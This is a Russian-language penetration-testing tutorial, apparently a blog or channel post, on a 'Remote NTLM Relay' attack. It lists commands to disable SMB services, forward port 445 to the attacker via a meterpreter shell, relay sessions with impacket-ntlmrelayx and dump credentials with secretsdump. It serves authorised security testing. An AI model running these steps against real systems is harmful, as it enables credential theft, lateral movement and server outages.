💻Yet Another NTLM Relay Attack💻 Многие слышали об атаках NTLM Relay, но, как и большинство атак, их осуществление возможно при достижении определенных условий. Зачастую такие атаки осуществляются либо при помощи Responder (в таком случае ключевую роль играет успешность отравления широковещательных запросов, используемых некоторыми протоколами в Windows-сетях), либо используется механизм принудительной аутентификации (A.K.A. Coerce). В первом случае нам необходим доступ к той же сети, где находится наша "жертва", а во втором мы получим возможность ретранслировать учетную запись компьютера в домене, что тоже не всегда приводит к желаемым результатам. В чем суть Remote NTLM Relay? Сегодня мы рассмотрим ещё одну вариацию атаки перенаправления аутентификации NTLM. Хоть она не пользуется большой популярностью в силу особенностей эксплуатации, знать о ней полезно. Речь идет о Remote NTLM Relay. Эта атака будет работать за счёт принудительной остановки SMB-служб на сервере и его дальнейшего перезапуска, чтобы весь трафик, поступающий на 445 порт сервера, был затем перенаправлен на атакующую машину. Благодаря этому атакующий может перенаправить (зарелэить) входящие сессии туда, куда ему нужно. Оригинальный пост, посвященный атаке, можно найти здесь, а единственное упоминание до этого исследования можно найти в этом блоге. Для эксплуатации нам нужно проделать несколько несложных этапов. Этап 1. Подготовка сервера👽 Чтобы настроить сервер для дальнейшей эксплуатации, нам нужно отключить SMB-службы и перезапустить его. Ниже приведены шаги для этого: 1. Отключение NetLogon: sc stop netlogon 2. Отключение и остановка SMB-сервера (службы LanManServer): sc stop lanmanserver sc config lanmanserver start= disabled 3. Полная остановка LanManWorkstation: sc stop lanmanworkstation sc config lanmanworkstation start= disabled Эти шаги можно увидеть на первом скриншоте. После отключения служб нужно перезагрузить машину (shutdown /r /t 0). Важно именно перезагрузить устройство, а не выключить его. После перезагрузки сервера уже известным способом получаем оболочку на нём (в ходе атаки я использую meterpreter). Этап 2. Настройка атакующей машины. На атакующей машине для ретрансляции NTLM используем скрипт ntlmrelayx.py из набора Impacket🐍. В демонстрационном примере атака осуществляется на сервер 10.201.126.30, так как он не требует подписания SMB. Прокси-сервер, используемый в ходе атаки, будет прослушивать на порту 1090, поэтому команда запуска скрипта выглядит следующим образом: proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090 Этап 3. TCP relay через meterpreter. При помощи полученной на первом этапе оболочки осуществляем перенаправление входящего на порт 445/TCP на стороне сервера трафика на атакующую машину, с которой будет осуществляться релэй (второй скриншот). portfwd add -R -L 10.51.124.39 -l 445 -p 445 Если все шаги проделаны верно, то мы можем поймать сессию и успешно ретранслировать её (третий скриншот). Этап 4. Постэксплуатация. После успешного релэя ntlmrelayx.py будет любезно держать для нас открытую сессию, поэтому, сделав кастомный конфиг для proxyсhains, мы можем использовать другие Impacket-like утилиты для постэксплуатации. В моём случае пользователь, сессию которого удалось ретранслировать, обладает высокими привилегиями относительно целевой машины, поэтому логично использовать secretsdump.py для получения новых учетных данных для горизонтального перемещения в домене (четвёртый скриншот): proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30 Причина, по которой этот вектор атаки не получил широкого распространения, заключается в его деструктивности: отключение SMB-служб на активно используемом сервере приведёт к DoS и простоям сервера. В реальных условиях такие последствия могут стать серьезной проблемой, поэтому выполнять атаку следует только с явного разрешения заказчика.